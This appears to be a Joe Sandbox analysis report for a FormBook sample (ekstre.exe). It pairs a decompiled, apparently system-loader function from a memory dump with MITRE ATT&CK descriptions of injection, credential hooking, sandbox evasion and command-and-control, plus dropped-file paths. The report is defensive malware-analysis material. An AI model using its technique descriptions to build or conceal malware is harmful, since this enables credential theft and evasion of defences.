C-Code - Quality: 67%

			E04CB9046(void* __ebx, signed char* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr* _t146;
				intOrPtr* _t148;
				signed char* _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x4d8be98);
				E04D07C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E04CF8F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E04CC9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x4da65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E04CCA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E04CD5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E04CD04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x4da65e0; // 0x75d6a680
							 *0x4da91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x4da65e8;
									if(_t148 != 0) {
										 *0x4da91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E04CCDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E04CC3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E04CC9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E04D1247B();
									goto L26;
								} else {
									_t152 = E04CCA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E04CD04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x04cb9046
0x04cb9046
0x04cb904b
0x04cb9050
0x04cb9055
0x04cb905b
0x04cb905d
0x04cb9066
0x04cb906f
0x04cb9078
0x04cb9080
0x04cb9088
0x04cb908f
0x04cb9095
0x04cb90a9
0x04cb90b1
0x04cb90be
0x04cb90c6
0x04cb90cf
0x04cb90e2
0x04cb90f7
0x04cb90fb
0x04cb9118
0x00000000
0x04cb9123
0x04cb913b
0x04cb913f
0x00000000
0x00000000
0x04cb9147
0x04d1231f
0x04d1231f
0x00000000
0x04d1231f
0x04cb9154
0x04d12330
0x04d12336
0x04d12336
0x04cb915a
0x04cb915a
0x04cb915a
0x04cb9161
0x04cb9167
0x04cb916b
0x04cb9172
0x04cb9182
0x04cb918e
0x04cb9199
0x04cb91ba
0x04cb91be
0x00000000
0x04cb91e0
0x04d12358
0x04d12360
0x04d12368
0x04d1236a
0x04d12372
0x00000000
0x04d12378
0x04d12378
0x04d12381
0x04d12458
0x04d12458
0x04d1245b
0x04d12463
0x04d12468
0x04d1246e
0x04d1246e
0x04d124a7
0x00000000
0x04d124a7
0x04d1238f
0x04d12396
0x04d1239c
0x04d1239f
0x04d1239f
0x04d123bb
0x04d123c8
0x04d123ca
0x04d123d2
0x04d1244c
0x04d1244c
0x04d12453
0x00000000
0x04d123d4
0x04d123e7
0x04d123e9
0x04d123f1
0x00000000
0x00000000
0x04d123f9
0x04d12402
0x04d12408
0x04d1240c
0x04d12413
0x04d12423
0x04d1243f
0x00000000
0x00000000
0x04d12441
0x04d12446
0x04d12446
0x00000000
0x04d12446
0x04d123fb
0x00000000
0x04d123fb
0x04d123d2
0x00000000
0x04d12372
0x04cb91be
0x04cb9118
0x04cb90fd
0x04cb9102
0x04cb910e

Strings

@, xrefs: 04CB9095
$, xrefs: 04CB90B1

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 3a3501ec8f231a0322dc833bd66fb30c6df820dfdcb10b919831d96d63d1bc1e
Instruction ID: 5b5d77c5f5cc7fad4dd2a04883fa78a09e9d53d14bd6837aa9bfb00e82dff7ac
Opcode Fuzzy Hash: 3a3501ec8f231a0322dc833bd66fb30c6df820dfdcb10b919831d96d63d1bc1e
Instruction Fuzzy Hash: 3D813EB1D002699BDB35CF54DC44BEEB7B5AB08714F0441DAEA0AB7250E731AE84DFA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ekstre.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\Airways_17.bmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\Apache License 2.0.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\Opisthoporeia.mus

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\api-ms-win-core-console-l1-2-0.dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation\preferences-desktop-locale-symbolic.symbolic.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation\preferences-system-search.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation\printer-printing-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation\security-low-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Disneyland\emblem-system-symbolic.svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Homeopathy224\Katodestraaler\Forkful.Spr

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Hoses\Unfurcate\Auditrerne\Stumpless\folder-new-symbolic.symbolic.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Intuitions\Fljtes\bluetooth-disabled-symbolic.symbolic.png

C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll

Windows Analysis Report
ekstre.exe

Function 00403640 Relevance: 81.0, APIs: 33, Strings: 13, Instructions: 450
stringfilecomCOMMON

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Function 00403D17 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215
stringregistryCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre